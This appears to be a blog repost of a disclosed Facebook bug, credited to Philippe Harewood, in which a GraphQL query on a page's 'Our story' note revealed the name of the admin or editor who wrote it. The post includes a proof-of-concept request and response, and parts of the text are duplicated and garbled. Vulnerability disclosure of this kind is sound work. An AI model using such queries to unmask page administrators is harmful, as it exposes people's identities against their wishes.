Facebook Page Admin mean to be secrete part to the "Facebook Page". Facebook Page has feature "Story" Called as "Our History". Actually this is a Normal Facebook Note which "Our History" is note title and description is "Body" part.
If Page Admin or Page editor will create this note, it will also disclose his name instead of page name because User has created it. That's the Bug occurred in this scenario. It should have return only "Page Name" Properly.
Here is, How the flow was discover over "GraphQL" query.
Author: Philippe Harewood.
Proof of Concept:
1) Request:
Impact:
This could have let a malicious user derive the name of a page admin or editor that last authored or edited the ‘Our story’ on any chosen page. Note: the attack only works for pages that have ‘Our story’ feature authored/edited.
Source: philippeharewood.com
If Page Admin or Page editor will create this note, it will also disclose his name instead of page name because User has created it. That's the Bug occurred in this scenario. It should have return only "Page Name" Properly.
Here is, How the flow was discover over "GraphQL" query.
Author: Philippe Harewood.
Proof of Concept:
1) Request:
GET /v2.12/graphql?q=nodes(page-id){page_story{from,published_document{document_owner}}} HTTP/1.12) Response:
Host: graph.facebook.com
{
"page-id": {
"page_story": {
"from": {
"name": "Page Name"
},
"published_document": {
"document_owner": {
"name": "Admin or Editor User Name"
}
}
}
}
}
Impact:
This could have let a malicious user derive the name of a page admin or editor that last authored or edited the ‘Our story’ on any chosen page. Note: the attack only works for pages that have ‘Our story’ feature authored/edited.
Source: philippeharewood.com
No comments:
Post a Comment